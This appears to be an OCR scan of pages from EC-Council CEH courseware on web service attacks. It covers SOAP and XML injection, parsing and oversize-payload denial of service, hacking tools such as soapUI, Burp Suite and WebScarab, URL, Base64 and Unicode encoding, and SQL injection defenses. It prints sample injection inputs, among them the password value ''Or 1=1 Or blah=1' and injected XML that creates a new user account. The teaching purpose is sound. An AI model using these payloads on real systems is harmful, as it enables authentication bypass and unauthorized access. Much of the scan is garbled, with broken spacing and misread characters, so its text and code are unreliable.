U sernam e f% x m ln s : xsi —' h t t p : / /w w w . w3 . o r g /2 0 0 1 /X M L S c h e m a -
in s t a n c e '
P assw ord [o n x m ln s : x s d ■ 'h t t p : //w w w .w3 . o r g / 2 0 0 1 / X M L S ch e m a '>
- < s o a p :B o d y >
< ? u l T«r: 10a■ 19
1.0 ine«d B ■ 'UTF-0' standaloo•■ '##"?> - < G e t P r o d u c t l n f o r m a t io n B y N a m e R e s p o n s e
- <SQk?-DIV:tav< pe xnilns S O A P C D K l-h ttp //wvw v) . o r«/2001/X H L Scb«i x m ln s ‫ " ״‬h t t p : / / j u g g y b o y / P r o d u c t I n f o / < ‫״‬
alas: SQAPS0X2‫ ׳‬h t t p //WWW w3 © rg /2 0 0 1 / XMLGchar* • i n s t a o c e
a l s : S0APSDK3‫ ׳‬h t t p : //s c h c s M : . x b 1 :o « p . o t f / s o t p / i B e e d i o ( / ' u l a i ‫ < ־‬G e tP r o d u c t ln f o r m a tio n B y N a m e R e s u lt >
SOAPEKV- http://:ebcB«: llf/iOip lenvclopcl ’> 2 5 
- <S0AP-DfV B o d y
- <2QA?SDX4 G«tProductlnfonmtionByNftoe P a i n t i n g l 0 1 
a l a : : SQAPSDX4*' http // }uggyboy/ProductInfo /'> 3 
<20APSDK4: name .►% </S0APSDK4 : name>
<20APSDK4: u1d> 312 - 111 - 854 3</SQAPSDK4 : m d > 1 5 0 0 
<£0APSDK4: pa::word> Or 1= 1 Or b l a h = 1</S0APS0K4 : pas < / G e t P r o d u c t l n f o r m a t i o n B y N a m e R e s u lt >
</S0APS0K 4 GetfrodnctlnforaitiooByNwo c/SOAP-EKV Body:• < /G e t P r o d u c t l n f o rm a t io n B y N a m e R e s p o n s e >
</S0AP- OT/ : Envelope*
< /s o ^ > : B ody>
< /s o a p : E n v e lo p e >
W e b S e r v ic e A tta c k s : S O A P In je c tio n
S im p le O b je c t Access P ro to c o l (SOAP) is a lig h tw e ig h t a n d s im p le X M L -b a s e d p ro to c o l

t h a t is d e s ig n e d to e x c h a n g e s tr u c tu r e d a n d ty p e in f o r m a tio n o n th e w e b . T h e X M L e n v e lo p e
e le m e n t is a lw a y s th e r o o t e le m e n t o f th e SO AP m e s s a g e in th e X M L s c h e m a . T h e a tta c k e r
in je c ts m a lic io u s q u e ry s trin g s in th e u s e r in p u t fie ld t o b yp a ss w e b s e rv ic e s a u th e n tic a tio n
m e c h a n is m s a n d access b a c k e n d d a ta b a s e s . T h is a tta c k w o rk s s im ila r ly to SQL in je c tio n a tta c k s .
Server Response
Q © http://iuggyboycom/ws/products.asm x
<?xm l v e r s io n = " l.0 " e n c o d in g = " u tf- 8 ' ?>

A c c o u n t Login - <soap: E n v e lo p e x m ln s : s o a p = ‫ ' י‬h t t p : / / schem as
. x m ls o a p .o r g /s o a p /e n v e lo p e /"
U s e rn a m e f %
‫■ >כב‬ x m ln s : x s i = 'h ttp ://w w w .w 3 . o r g / 2 0 0 1 /X M L S c h e m a -
in s ta n c e '
P a s s w o rd ôr 1 1 ‫ ־‬orb b h SL b n i : x m ln s : x s d = ‫ ׳‬h t t p : //w w w .w3 . o r g / 2 0 0 1 / X M L S c h e m a '>
- < s o a p :B o d y >
<? x k 1 v e r s i o n - ' 1 . 0 ' e n c o d i n g - U T r - 8 ' s t a n d a l o n e - 'n o " ? >

- < G e tP r o d u c tIn fo r m a tio n B y N a m e R e s p o n s e
- < S 0 A P -B N V :E n v elo p e x m ln s : SO A PSD K l-'‫־‬h ttp : //w w w .w 3 .o r g /2 0 0 l/ * M L S c h e 1 x m ln s = " h t t p : / / j u g g y b o y / P r o d u c t I n f o / " >
m i n i : SOAPSDK2— ' http ://www. w3 .org/ 2001/ XMLSchema - inatance'
x a l m : SOAPSDK3=' http://sche1aas.xa11a0ap.org/90ap/enc0ding/' xalna: - < G e t P r o d u c t I n f o rm a tio n B y N a m e R e s u it>
1
SOAPEKV-•h t t p : / / * c h e * d s .x ja l8 0 a p . 0 r g / 8 0 a p J e n v e l o p e J r> 25 
<S0AP-BNV:B0dy> P a in t in g l0 1 
- < S O A P S D K 4 :O e tP r o d o c tln fo r « o tio n B y N n m e
n l n s : S0APSDK4—' h t t p : / / j u g g y b o y / P r o d u c t l n f o / ' > 3 
<SOAPSDK4 naae>% </SOAPSDK4: name>
 1 5 0 0 
<S0A?SBK4: uld>312 - 111 - 8543</SOAPSDK4: uld>
<SOAPSDK4: paaaword>' O r 1 * 1 O r b l a h ■ </SOAPSDK4: paaaword> < /G e tP r o d u c tln fo r m a tio n B y N a m e R e s u lt>
</SOAPSDK 4: cotProdactlnformatlonByNamo> </SOAP E N V :B0dy> < / G e tP r o d u c tln fo r m a tio n B y N a m e R e s p o n s e >
<JSOAP BNV : Envoi opo>
< /s o a p : Body>
< /c o a p : E n v e lo p e >
FIGURE 1 3 .5 4 : SO A P I n je c tio n
M o d u le IB Page 1900 Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0l1nCil

Web Service Attacks: X M L

CEH
In je c tio n
A tta c k e rs in je c t X M L d a ta a n d ta g s in to u s e r in p u t fie ld s to m a n ip u la t e X M L sch e m a o r p o p u la te
X M L d a ta b a s e w ith b o g u s e n tr ie s
X M L in je c tio n can be u se d to byp a ss a u t h o r i z a t i o n , e s c a la te p r iv ile g e s , a n d g e n e ra te w e b s e r v ic e s
D o S a tta c k s
S e rv e r S id e C o d e
http://juggyboy.com/ws/login.asmx
< ? xm l v e r s i o n 1 . 0 " ‫ " ־‬e n c o d in g ‫ " ־‬IS O - 8 8 5 9 - ! " ? >

•cuser s>

 g a n d a l f 
 ‫ י‬c 3 
 l 0 1 
<ma1 1 > g a n d a lf 0 n u d d le e a r t h . ccnK / m a il >


M ar k 
 l2 3 4 5 
 l 0 2 
S u b m it
< m a il> g a n d a lf ( ? m id d le e a r th . c o tr K /m a il>
J 
■ j a s on C re a te s n e w
m ark@ certifiedhacker.com </mail> </user>
■ a ttc )c 
<u$er> <username>Jason</usemame> ■ 1 0 5 
o n th e s e rv e r
<password>attack</password> ■ < m a il> ja s o n @ ju g g y b o y • c o n K /m a il>
<userid>105</useridxm ail>jason (Sjuggyboy.com ■ < ^ u s e r>

C o p y r i g h t © b y E C - G a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k s : X M L In je c tio n
T h e p ro c e s s in w h ic h th e a tta c k e r e n te rs v a lu e s t h a t q u e ry X M L w ith v a lu e s t h a t ta k e
a d v a n ta g e o f e x p lo its is k n o w n as an X M L in je c tio n a tta c k . A tta c k e r s in je c t X M L d a ta a n d ta gs
in to u s e r in p u t fie ld s to m a n ip u la te X M L s c h e m a o r p o p u la te X M L d a ta b a s e w ith b o g u s e n trie s .
X M L in je c tio n can be used to b yp a ss a u th o r iz a tio n , e s c a la te p riv ile g e s , a n d g e n e ra te w e b
s e rv ic e s DoS a tta c k s .
S e r v e r S id e C o d e
o o http://j1Jggyboy.com/ws/10gin.asmx
< ? x n l v e r s io n ■ 1 . 0 *‫ "׳‬e n c o d i n g - ' I S O ‫ ־‬8 8 5 9 ‫ ־‬l " ? >

Account Login 
 g a n d a 1 £*
 ! a 3 
U sernam e Mark 1 0 1 
< r ‫־‬. a i l > g a n d a l f ■ 'r . i d d l e e a r t h . c o m < / r ‫־‬. a i l >
</user>
Password 12345 

 M a r]c 
 1 2 3 4 5 
 1 0 2 
E-mail
a il
< r 1 a il> g a n d a l£ 3 m id d l« « a r t h . c o m < /m a il>
A 
m ark@ >certifiedhacker.com </m ailx/user> I

J ûser5■
I
<ua*rna.*n#> ja s o n 
<pas3word>attck</pa3sword>
•
;
!
C re a te s n e w
<user> <username>Jason</username> user account

| 1 0 5 
<password>attack</password> ■ < m a !l> ja s o n t" j u g g y b o y . o o m < /m » il> ■ o n th e s e rv e r
• 
<userid>105</useridxm ail>jason@ >juggyboy.com

FIGURE 1 3 .5 5 : XML I n je c tio n

W eb S e rv ic e s P a rs in g A tta c k s CEH
B P a r s in g a tta c k s e x p lo it v u ln e r a b ilit ie s a n d w e a k n e s s e s in th e p r o c e s s in g c a p a b ilit ie s o f th e X M L
p a rs e r to c re a te a d e n ia l- o f - s e r v ic e a tta c k o r g e n e ra te lo g ic a l e r r o r s in w e b s e r v ic e r e q u e s t
p r o c e s s in g
A t t a c k e r q u e r ie s f o r w e b s e r v ic e s w it h a A tta c k e rs s e n d a p a y lo a d t h a t is
g r a m m a t ic a lly c o r r e c t S O A P d o c u m e n t t h a t e x c e s s iv e ly la r g e t o c o n s u m e a ll s y s te m s
c o n t a in s in f in it e p r o c e s s in g lo o p s r e s u lt in g re s o u rc e s r e n d e r in g w e b s e r v ic e s
in e x h a u s tio n o f X M L p a rs e ra n d C P U in a c c e s s ib le t o o t h e r le g itim a te u s e rs
re s o u rc e s
W e b S e r v ic e s P a r s in g A tta c k s
A p a rs in g a tta c k ta k e s p la c e w h e n an a tta c k e r s u c c e e d s in m o d ify in g th e file re q u e s t o r

s trin g . T h e a tta c k e r ch a n g e s th e v a lu e s b y s u p e rim p o s in g o n e o r m o re o p e r a tin g s y s te m
c o m m a n d s via th e re q u e s t. P a rsin g is p o s s ib le w h e n th e a tta c k e r e x e c u te s th e .b a t (b a tc h ) o r
.c m d (c o m m a n d ) file s . P a rsin g a tta c k s e x p lo it v u ln e r a b ilitie s a n d w e a k n e s s e s in th e p ro c e s s in g
c a p a b ilitie s o f th e X M L p a rs e r to c re a te a d e n ia l-o f-s e rv ic e a tta c k o r g e n e ra te lo g ic a l e rro rs in
w e b s e rv ic e re q u e s t p ro c e s s in g .
R e c u r s iv e P a y lo a d s
X M L can e a s ily n e s t o r a rra n g e th e e le m e n ts w ith in th e s in g le d o c u m e n t to a d d re s s

th e c o m p le x r e la tio n s h ip s . A n a tta c k e r q u e rie s f o r w e b s e rv ic e s w ith a g ra m m a tic a lly
c o r r e c t SOAP d o c u m e n t t h a t c o n ta in s in f in ite p ro c e s s in g lo o p s re s u ltin g in e x h a u s tio n o f X M L
p a rs e r a n d CPU re s o u rc e s .
O v e r s iz e P a y lo a d s
In th e s e p a y lo a d s , X M L is r e la tiv e ly v e rb o s e a n d p o te n t ia lly la rg e file s a re a lw a y s in to

th e c o n s id e r a tio n o f p r o te c tin g th e in fr a s tr u c tu r e . P ro g ra m m e rs w ill lim it th e d o c u m e n t's size.
A tta c k e rs se n d a p a y lo a d t h a t is e x c e s s iv e ly la rg e t o c o n s u m e all s y s te m re s o u rc e s , re n d e rin g
w e b s e rv ic e s in a c c e s s ib le to o th e r le g itim a te u sers.

Web Service A ttack Tool: soapUI
s o a p U I is a o p e n s o u r c e
f u n c tio n a l te s tin g t o o l, m a in ly
u s e d f o r w e b s e r v ic e t e s tin g
It s u p p o rts m u ltip le p r o to c o ls
s u c h a s SO AP , REST, H TTP, JM S ,
A M F , a n d JD BC
A t ta c k e r c a n u s e th is t o o l t o
c a rry o u t w e b s e r v ic e s p r o b in g ,
S O A P in je c tio n , X M L in je c tio n ,
a n d w e b s e r v ic e s p a r s in g
a tta c k s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h ib it e d
W e b S e r v ic e A tta c k T o o l: s o a p U I
T S o u rc e : h ttp ://w w w .s o a p u i.o rg
s o a p U I is an o p e n s o u rc e fu n c tio n a l te s tin g to o l, m a in ly used f o r w e b s e rv ic e te s tin g . It s u p p o rts

m u ltip le p r o to c o ls su ch as SO AP, REST, HTTP, JM S , A M F , a n d JDBC. It e n a b le s y o u to c re a te
a d v a n c e d p e r fo r m a n c e re s ts v e ry q u ic k ly a n d ru n a u to m a te d fu n c tio n a l te s ts . W ith th e h e lp o f
th is to o l, a tta c k e rs can e a s ily p e r fo r m w e b s e rv ic e s p ro b in g , SOAP in je c tio n , X M L in je c tio n , a nd
w e b s e rv ic e s p a rs in g a tta c k s .

Web Service Attack Tool: XMLSpy C EH
j A lto v a XMl S p y
: Fic E it Frcject >M- DTDfSchcmo Cchcrno design XSLJXQucry Authentic Convert View Ercwso‫׳‬
A lto v a X M L S p y is t h e X M L e d ito r a n d
d e v e lo p m e n t e n v ir o n m e n t fo r
:W
SDL SOAP Tools W
indow Help
a i a . a 12- ‫׳‬,a j 1^ ip iia in ig iB ■ !r , W H ff iilF b
m o d e lin g , e d itin g , tr a n s fo r m in g , a n d
; ‫כ‬. jg 1> ■ ft, [^<s- <y B ! y 00 & -
d e b u g g in g X M L - r e la te d te c h n o lo g ie s
ncyR 3 XSL O u tp u t , h tm t
httpTVivsw'AS orgf20
m/XML£cnerria-1nsta ‫פד‬
nee‫־‬
xslscnenraLocation
h ttp /x m s 3y. neVag e r
c/fschem astoersonn
el
Ksi:fot‫־‬eachse1ect="
n1:Firs1Name">
> I I i i I 1I ‫י‬
span s ty le -'col or: navy:
font-famity:Arial;
A
‫ ־‬P e rs o n n
The
C:\rneAaemvx$d'> font• size :12pt;

- P c io o ra D o io - font-we 1ah tb old;">
1< II I I : I II <
NiM^/FirstNJarr1«s► «cj:‫ ג‬ppV-tompialo ‫ס‬/‫•י‬ F irs t N a i r n
j < la s tN a m e »
0evgood«f «pan>
Q 'h * A * n c >«3 © A q e n ts
X Call Stack
| V<lu» / Atlrih N»<n»____ D ccunrnt
tJ ( ) Per v jt aDato Elcniat xsl:rcr-eech TheAgencyR3.xsf Tertiporarr Re$» *
tl () ‫״‬lrsNane Oam
ert xsl:fo‫־־‬eo=h Thc.AgcncyR3.x5H Temporary Res‫_ ׳‬
lerf vsl:f<y-*!ch Th*A{jf>nryR3 *«H TM por»rvR«1

xsl:for-ea:h TheAgencyR3.xsH Temporary Res!
0 () -ostMoire Etoner*
v | kocty Thc.AgcncyR3.xiH Tcnpw ar/Rc5< v
ra ( ) H e ElOTtcr*
Concert Varables <FattvWatah Call Stack Templates Into Messaoes Trace
h ttp ://w w w . altova.com
C o p y r i g h t © b y E C - C a u a c tl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e A tta c k T o o l: X M L S p y
^ 2 S o u rc e : h t t p : / / w w w . a lt o v a . c o m
A lto v a XM LSpy is th e XML e d ito r and d e v e lo p m e n t e n v ir o n m e n t fo r m o d e lin g , e d itin g ,

tr a n s fo r m in g , a n d d e b u g g in g X M L -re la te d te c h n o lo g ie s . It o ffe rs g r a p h ic a l s c h e m a d e s ig n e r,
S m a rt Fix v a lid a tio n , a c o d e g e n e r a to r , file c o n v e rte rs , d e b u g g e rs , p ro file r s , fu ll d a ta b a s e
in te g r a tio n , and s u p p o rt fo r W SDL, SOAP, XSLT, X P a th , X Q u e ry , XBRL, and O pen XM L
d o c u m e n ts , p lu s V is u a l S tu d io a nd E clipse p lu g -in s , a nd m o re .

So fa r, w e h a ve d iscu sse d w e b a p p lic a tio n c o n c e p ts , th r e a ts a s s o c ia te d w ith w e b

a p p lic a tio n , a n d th e h a c k in g m e th o d o lo g y . N o w w e w ill d iscu ss h a c k in g to o ls . T h e se to o ls h e lp
a tta c k e rs in r e tr ie v in g s e n s itiv e in fo r m a tio n a n d a lso to c r a ft a n d se nd m a lic io u s p a c k e ts o r
re q u e s ts t o th e v ic tim . W e b a p p lic a tio n h a c k in g to o ls a re e s p e c ia lly d e s ig n e d f o r id e n tify in g th e
v u ln e r a b ilitie s in th e w e b a p p lic a tio n . W ith th e h e lp o f th e s e to o ls , th e a tta c k e r can e a s ily
e x p lo it th e id e n tifie d v u ln e r a b ilitie s a n d c a rry o u t w e b a p p lic a tio n a tta c k s .
^ W e b A p p P en T e s tin g W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
C o u n te r m e a s u r e s fs=9 H a c k in g M e th o d o lo g y
S b )
‫ץ‬ W e b A p p lic a tio n H a c k in g T o o ls
•^‫י־‬-

Web Application Hacking Tool:

Burp Suite Professional
S o u rc e : h t t p : / / w w w . p o r t s w ig g e r . n e t
B u rp S u ite is an in te g ra te d p la tfo r m f o r p e r fo r m in g s e c u r ity te s tin g o f w e b a p p lic a tio n s . Its

v a rio u s to o ls w o r k to g e th e r to s u p p o r t th e e n tir e te s tin g p ro c e s s , fr o m in itia l m a p p in g and
a n a ly s is of an a p p lic a tio n 's a tta c k s u rfa c e , th r o u g h to fin d in g and e x p lo itin g s e c u r ity
v u ln e r a b ilit ie s . B u rp S u ite c o n ta in s ke y c o m p o n e n ts su ch as an in te r c e p tin g p ro x y , a p p lic a tio n -
a w a re s p id e r, a d v a n c e d w e b a p p lic a tio n s c a n n e r, in t r u d e r to o l, r e p e a te r to o l, s e q u e n c e r to o l,
e tc .


CookieDigger CEH
j CookieDigger helps id e n tify w eak cookie g e n e ra tio n and insecure im p le m e n ta tio n s o f session m anage m ent by w eb a p p lica tions
J It w o rk s by c ollecting and analyzing cookies issued by a w eb a p p lic a tio n fo r m u ltip le users
J The to o l re p o rts on th e p re d ic ta b ility and e n tro p y o f th e cookie and w h e th e r critic a l in fo rm a tio n , such as user nam e and
passw ord, are included in th e cookie values
F oundstone C ookie D igg er
F o u n d s t o n e | C o o k ie D ig g e r
'/* tea URLs
‫ן‬i/Vim* .‫ווק‬/com 31
accounts gootfe coro/Seracelogn A ih ,' f_soace‫־״‬et «tnp v.3A"2.‫׳‬F 2 ..‫־‬ffrai
m»l.google.conz_,'na»-1t*1c/_/)s./>Mr.lrj11f1*Ai1er»X04lWI$a»St.«n/rv'*1/| ' jd fn
https y/tnal.google oorvmalAvO.Ai •28v1ew*«ptver^hrt4nw»*r4
https://mtti
si google cwn/VnaHi/UAj « 2hin»âpl w nchm > 6 t1 4
(jw d ‫«*■**־‬p»e
https /‫׳‬/■c U M 1 4 tn•! gt>3gl» com/tnsl'U/OAj

https y/W»l.google corvm»l'u/Q/'Vw • • 1
https .AVnsI google axn/_/'1nad‫*׳‬tat1c/_/i«/^Mn/» 1 jt« 4 v ‫׳‬vaf»X0WKE»e4c an
https //hi•! gosgl• con /*‫«יז‬u/O.'^J ■2>v»w<)«p,'1
https y/W»l.g00gl*.C«ffV,m»l ‫*׳‬U/0. , J •24vww<«plvar*chfiHrw&-tr
hflps //Vnal google co«n/n>alA^0-'>j«28vTew^>spUw <1W*rwQ*ty<4
11
https //h»«l google co!nATwlAj/t)Aj*ft r tt y«c
fts /Amk\jp dt ‫ ׳‬HardAdnwvhtir
/ httpy/maim.oom
http //WWW r convlognvtrfy y c
http y/m*l r.o0ffvr*wm»(Atand«tphp>»^d*U^••

about War*
http //hotmatl/
http y/ww*.f>otm»l com/
« Back Mod >
h ttp ://w w w .m c a fe e .c o m
W e b A p p lic a tio n H a c k in g T o o l: C o o k ie D ig g e r
S o u rc e : h ttp ://w w w .m c a fe e .c o m
C o o k ie D ig g e r is a to o l th a t d e te c ts v u ln e r a b le c o o k ie g e n e r a tio n and th e in s e c u re
im p le m e n ta tio n o f se ssio n m a n a g e m e n t by w e b a p p lic a tio n s . T his to o l is b a se d o n th e
c o lle c tio n a n d e v a lu a tio n o f c o o k ie s b y a w e b a p p lic a tio n used b y m a n y users.
C e r ta in ty a n d e n tr o p y o f th e c o o k ie a re fa c to rs o n w h ic h th e to o l re lie s . T h e c o o k ie v a lu e s
c o n ta in v a lu a b le in fo r m a tio n su ch as th e lo g in d e ta ils o f th e u s e r (u s e r n a m e a n d p a s s w o rd ).


WebScarab CEH
W e b S c a ra b is a f r a m e w o r k f o r a n a ly z in g a p p lic a tio n s t h a t c o m m u n ic a te u s in g t h e HTTP a n d HTTPS p r o to c o ls
I t a llo w s th e a tta c k e r to r e v ie w a n d m o d if y re q u e s ts c re a te d b y th e b r o w s e r b e fo re th e y a re s e n t to th e s e rv e r,
a n d to r e v ie w a n d m o d if y re s p o n s e s re tu rn e d fr o m th e s e rv e r b e fo re th e y a re r e c e iv e d b y th e b ro w s e r
F ile V ie w Io o ls H e lp
S u m m a ry M e s s a g e lo g P ro x y M anual R equest W e b S e r v ic e s S p id e r E x t e n s io n s S e s s io n ID A n a ly s is S c r ip t e d F r a g m e n ts C o m p a re
2 S u m m a ry
□ T r e e S e le c tio n n i t e r s c o n v e r s a t io n l i s t
U rl M e th o d s S ta tu s | S e t- C o o k ie C o m m e n ts S c n p ts
? (1 5 h ttp ://w w w .o w a s p .o ra :8 0 / GET 30 1 M o v e d .. □ □ □
°‫ ־‬n b a n n e rs / □ □ □
o- n im a a e s / □ □ □
9 (1 3 in d e x p h p / □ □ □
O M a ln _ P a g e GET 200 OK □ E
o- □ s k in s / □ □ □
H ost P a th S ta tu s O r ig in
'‫ ׳‬U U b/U b O T U t I h ttp /M v w w o w a s p o rg BU /s k in s / m o n o b o o k / m a in '•‫׳‬/‫־‬ 2DUO K
http:fA 1v w w .o w a s p .o rg 80 /s k in s / c o m m o n / IE F ix e s P ro x y
h ttp ://w w w .o w a s p .o r g .8 0 /s k in s / c o m m o n / c o m m o P ro x y
2 0 0 6 /0 6 /2 3 GET h t tp ://w w w .o w a s p o rg 8 0 /in d e x p h p /M a m _ P a g e P ro x y
2 0 0 6 /0 6 /2 3 ... G E T h t tp : //w w w . o w a s p .o r g .8 0 l/ P ro x y
h ttp ://w w w .o w a s p .o rg
W e b A p p lic a tio n H a c k in g T o o l: W e b S c a r a b
S o u rc e : h t tp ://w w w .o w a s p .o r g
W e b S c a ra b is a fr a m e w o r k f o r a n a ly z in g a p p lic a tio n s t h a t c o m m u n ic a te u s in g th e HTTP a nd

HTTPS p ro to c o ls . It is w r it t e n in Java, a n d is th u s p o r ta b le to m a n y p la tfo rm s . W e b S c a ra b has
s e v e ra l m odes o f o p e r a tio n , im p le m e n te d by a num ber of p lu g in s . It o p e ra te s as an
in te r c e p tin g p ro x y , a llo w in g th e a tta c k e r t o r e v ie w a n d m o d ify re q u e s ts c re a te d b y th e b ro w s e r
b e fo re th e y a re s e n t to th e s e rv e r, a n d to r e v ie w a n d m o d ify re s p o n s e s r e tu r n e d fr o m th e
s e rv e r b e fo re th e y a re re c e iv e d by th e b ro w s e r. It is e v e n a b le to in te r c e p t b o th HTTP a nd
HTTPS c o m m u n ic a tio n . The o p e r a to r can a lso r e v ie w th e c o n v e rs a tio n s (re q u e s ts a nd
re s p o n s e s ) t h a t h a ve passed th r o u g h W e b S c a ra b .

Web A p p lica tio n H ackin g Tools I CEH
M In s ta n t S o u rc e
h t t p : / / w w w . b la z in g t o o ls . c o m
H ttp B e e
h t t p : / / w w w . oO o. n u
■ a — s ‫־‬
w 3 a f T e le p o r t P ro
h t t p : / / w 3 a f . s o u r c e fo r g e , n e t ^ ► ^4) h ttp : / / w w w .te n m a x . c o m
G N U W g e t W e b C o p ie r
h t t p : / / g n u w in 3 2 . s o u r c e f o r g e , n e t h t t p : / / w w w . m a x im u m s o f t . c o m
‫י‬
B la c k W id o w
h t t p : / / s o f t b y t e la b s . c o m
& H T T T R A C K
h t t p : / / w w w .h tt r a c k . c o m
f£3 c U R L
h t t p : / / c u r I. h a x x . s e
M ile S C A N P a ro s P ro
h t t p : / / w w w . m ile s c a n . c o m
/ \ W e b A p p lic a tio n H a c k in g T o o ls
A fe w m o re to o ls t h a t ca n be used f o r h a c k in g w e b a p p lic a tio n s a re lis te d as fo llo w s :
© In s ta n t S o u rce a v a ila b le a t h ttp ://w w w .b la z in g to o ls .c o m
© w 3 a f a v a ila b le a t h ttp ://w 3 a f. s o u r c e fo r g e . n e t
© G N U W g e t a v a ila b le a t h ttp ://g n u w in 3 2 .s o u r c e fo r g e .n e t
© B la c k W id o w a v a ila b le a t h ttp ://s o ftb y te la b s . c o m
© cURL a v a ila b le a t h ttp ://c u r l.h a x x .s e
© H ttp B e e a v a ila b le a t h t t p : / / w w w . 0 Q0 .nu
© T e le p o r t P ro a v a ila b le a t h t tp ://w w w .te n m a x .c o m
© W e b C o p ie r a v a ila b le a t h ttp ://w w w .m a x im u m s o ft. c o m
© H i l l RACK a v a ila b le a t h t t p : / / w w w . h t t r a c k . c o m
© M ile S C A N P a ro sP ro a v a ila b le a t h ttp ://w w w .m ile s c a n .c o m

ModuleFlow
W e b A p p Pen T e s tin g
0‫ י‬I, W e b A p p C o n c e p ts
S e c u rity T oo ls
q y
& W e b A p p T h re a ts
C o u n te rm e a s u re s
W e b A p p lic a tio n H a c k in g T o o ls
So fa r, w e h a ve d iscu sse d v a rio u s c o n c e p ts su ch as th r e a ts a s s o c ia te d w ith w eb

a p p lic a tio n s , h a c k in g m e th o d o lo g y , a nd h a c k in g to o ls . A ll th e s e to p ic s ta lk a b o u t h o w th e
a tta c k e r b re a k s in to a w e b a p p lic a tio n o r a w e b s ite . N o w w e w ill d iscu ss w e b a p p lic a tio n
c o u n te r m e a s u r e s . C o u n te rm e a s u re s a re th e p ra c tic e o f u s in g m u ltip le s e c u r ity s y s te m s o r
te c h n o lo g ie s to p re v e n t in tru s io n s . These a re th e ke y c o m p o n e n ts fo r p r o te c tin g a nd
s a fe g u a rd in g th e w e b a p p lic a tio n a g a in s t w e b a p p lic a tio n a tta c k s .
V W e b A p p P en T e s tin g /jj&Mk W e b A p p C o n c e p ts
^ S e c u r ity T o o ls W e b A p p T h r e a ts
•.r"
C o u n te rm e a s u re s e5=‫־‬ H a c k in g M e th o d o lo g y
(j ' ‫י‬
m
W e b A p p lic a tio n H a c k in g T o o ls
vf 1

EncodingSchemes CEH
W e b a p p lic a tio n s e m p lo y d iff e r e n t e n c o d in g s c h e m e s fo r th e ir
d a ta to safely handle unusual characters and binary data i n th e
w a y y o u in te n d
URL e n c o d in g is t h e p ro c e s s o f c o n v e rtin g URL in to v a lid ASCII

f o r m a t so t h a t d a ta c a n b e s a fe ly t r a n s p o r te d o v e r HTTP
URL e n c o d in g re p la c e s u n u s u a l ASCII c h a ra c te rs w ith "% "

fo llo w e d b y t h e c h a ra c te r's t w o - d ig it ASCII c o d e e x p re s s e d in
h e x a d e c im a l s u c h as:
%3 ‫ט‬d ‫־‬
a % 0a N e w lin e
« %20 space
A n H T M L e n c o d in g s c h e m e is used t o re p re s e n t u n u s u a l
c h a ra c te rs so t h a t th e y c a n be s a fe ly c o m b in e d w ith in an
HTML d o c u m e n t
It d e fin e s s e v e ra l H T M L e n titie s t o re p re s e n t p a r tic u la rly

u s u a l c h a ra c te rs s u ch as:
E n c o d in g S c h e m e s
— ‫—־‬ HTTP p ro to c o l a n d th e H T M L la n g u a g e a re th e tw o m a jo r c o m p o n e n ts o f w e b
a p p lic a tio n s . B o th th e s e c o m p o n e n ts a re te x t b a se d . W e b a p p lic a tio n s e m p lo y e n c o d in g
s c h e m e s t o e n s u re b o th th e s e c o m p o n e n t h a n d le u n u s u a l c h a ra c te rs a n d b in a r y d a ta s a fe ly .
T h e e n c o d in g s c h e m e s in c lu d e :
m U R L E n c o d in g
URLs a re p e r m itte d to c o n ta in o n ly th e p r in ta b le c h a ra c te rs o f ASCCI c o d e w ith in th e

ra n g e 0 x 2 0 -0 x 7 e in c lu s iv e . S e ve ra l c h a ra c te rs w ith in th is ra n g e h a v e s p e c ia l m e a n in g
w h e n th e y a re m e n tio n e d in th e URL s c h e m e o r HTTP p ro to c o l. H e n c e , su ch c h a ra c te rs are
r e s tr ic te d .
URL e n c o d in g is th e p ro ce ss o f c o n v e rtin g URLS in to v a lid ASCII f o r m a t so t h a t d a ta can be

s a fe ly tr a n s p o r te d o v e r HTTP. URL e n c o d in g re p la c e s u n u s u a l ASCII c h a ra c te rs w it h "% "
fo llo w e d b y th e c h a ra c te r's t w o - d ig it ASCII c o d e e x p re s s e d in h e x a d e c im a l su ch as:
Q %3d
Q %0a New l i n e
9 %20 space

E n c o d in g S c h e m e s CE H
( C o n t 1(!)
B a se 6 4 Encoding Hex Encoding
Base64 enco ding schem e HTML e n c o d in g schem e uses

re p re s e n ts any b in a ry data hex v alue o f e v e ry ch a ra c te r
using o n ly p rin ta b le ASCII t o re p re s e n t a c o lle c tio n o f
characters characters f o r tra n s m ittin g
b in a ry data
tt Exam ple:
H e llo A 125C 458D 8
Jason 123B684A D 9
C opyright © by EC-Cauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
E n c o d in g S c h e m e s ( C o n t ’d )
Unicode Encoding Base 64 Encoding Hex Encoding
Unicode is a character encoding Base 64 sche m e s a re used t o encode A n H T M L e n c o d in g sc h e m e uses h e x v a lu e

standard that is designed to support b in a ry d a ta . A Base 64 e n c o d in g s chem e of e v e ry c h a ra c te r to re p re s e n t a
all of the writing systems used in the re p re s e n ts any b in a ry d a ta u sing o n ly c o lle c tio n o f c h a ra c te rs f o r tra n s m ittin g
world. Unicode is exclusively used to p rin ta b le ASCII c h a ra c te rs . U s u a lly it is b in a ry da ta .
hack web applications. Unicode used f o r e n c o d in g e m a il a tta c h m e n ts f o r
encoding helps attackers to bypass safe tra n s m is s io n over SM TP a n d also
E xa m ple:
the filters. used f o r e n c o d in g u s e r c re d e n tia ls . H e llo A125C 458D 8
16-bit Unicode encoding: Exam ple: Jason 123B 684A D 9
It replaces unusual Unicode cake
characters with "%u" followed by the 0110001101100001011010110110
character's Unicode code point 0101
expressed in hexadecimal:
B ase64 E n c o d in g : 011000
% u2 2 1 5 / 110110 000101 101011 011001
010000 000000 000000
% u0 0 e 9
U T F -8
It is a variable-length encoding
standard that uses each byte
expressed in hexadecimal and
preceded by the %prefix:
%c2%a9
%«2%89%a0
TABLE 1 3 .2 : E n c o d in g S c h e m e s T a b le

How to Defend Against SQL

Injection Attacks CEH
L im it th e le n g th o f u s e r in p u t
Use c u s to m e r r o r m essages
M o n it o r DB tr a f fic using an IDS, W AF
D isable c o m m a n d s lik e x p _ c m d s h e ll
Is o la te d a ta b a s e s e rv e r a n d w e b s e rv e r
JT
